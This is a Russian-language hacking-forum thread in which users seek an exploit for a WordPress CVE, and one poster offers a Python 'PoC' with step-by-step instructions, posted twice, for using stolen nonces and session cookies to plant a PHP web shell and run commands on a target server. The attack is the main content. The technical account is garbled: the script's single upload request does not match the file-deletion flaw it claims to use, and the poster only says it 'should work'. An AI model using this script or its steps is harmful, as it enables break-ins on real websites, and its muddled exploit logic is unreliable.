Есть ли у кого-нибудь эксплойт для этой CVE?
-
XSS.stack #1 – первый литературный журнал от юзеров форума
это уже нагуглил? не пашет? https://github.com/boku7/CVE-2020-23839
- Автор темы
- Добавить закладку
- #3
Это не то...
- Автор темы
- Добавить закладку
- #4
Это не то...
PoC для загрузки шелла на сайт.
Инструкция:
CVE-2020-28039 затрагивает версии WordPress до 5.5.2, позволяя злоумышленнику использовать функцию is_protected_meta() для удаления произвольных файлов. Данный эксплойт использует эту уязвимость для загрузки PHP-оболочки (shell.php) на цель, обманом заставляя систему удалить критические файлы и установить оболочку.
Шаги:
1. Получите доступ к валидному nonce и cookies целевой сессии WordPress (администратора или аутентифицированного пользователя).
2. Используйте уязвимость удаления произвольных файлов, чтобы заменить ключевые файлы на сервере пользовательской PHP-оболочкой.
3. После загрузки оболочка может быть использована для выполнения произвольных команд на целевом сервере.
По сути, должен работать. По вопросам пиши в лс форума.
Инструкция:
CVE-2020-28039 затрагивает версии WordPress до 5.5.2, позволяя злоумышленнику использовать функцию is_protected_meta() для удаления произвольных файлов. Данный эксплойт использует эту уязвимость для загрузки PHP-оболочки (shell.php) на цель, обманом заставляя систему удалить критические файлы и установить оболочку.
Шаги:
1. Получите доступ к валидному nonce и cookies целевой сессии WordPress (администратора или аутентифицированного пользователя).
2. Используйте уязвимость удаления произвольных файлов, чтобы заменить ключевые файлы на сервере пользовательской PHP-оболочкой.
3. После загрузки оболочка может быть использована для выполнения произвольных команд на целевом сервере.
Python:
import requests
import os
target_url = "https://example.com"
upload_dir = "/wp-content/uploads/shell/" # Adjust the path based on target server settings
wp_nonce = "your-nonce-value" # Obtain a valid nonce from the authenticated session
cookie = {'wordpress_logged_in': 'your-session-cookie'} # Session cookies for authentication
local_shell_file = "shell.php"
def upload_shell(shell_file_path):
if not os.path.exists(shell_file_path):
print(f"[-] Shell file not found: {shell_file_path}")
return
with open(shell_file_path, 'rb') as f:
shell_content = f.read()
payload = {
'action': 'delete_meta',
'meta_key': upload_dir + 'shell.php',
'_wpnonce': wp_nonce
}
files = {
'file': ('shell.php', shell_content, 'application/x-php')
}
response = requests.post(target_url, data=payload, cookies=cookie, files=files)
if response.status_code == 200:
print(f"[+] Shell uploaded successfully! Access it here: {target_url}{upload_dir}shell.php")
else:
print(f"[-] Failed to upload shell. Status code: {response.status_code}")
upload_shell(local_shell_file)По сути, должен работать. По вопросам пиши в лс форума.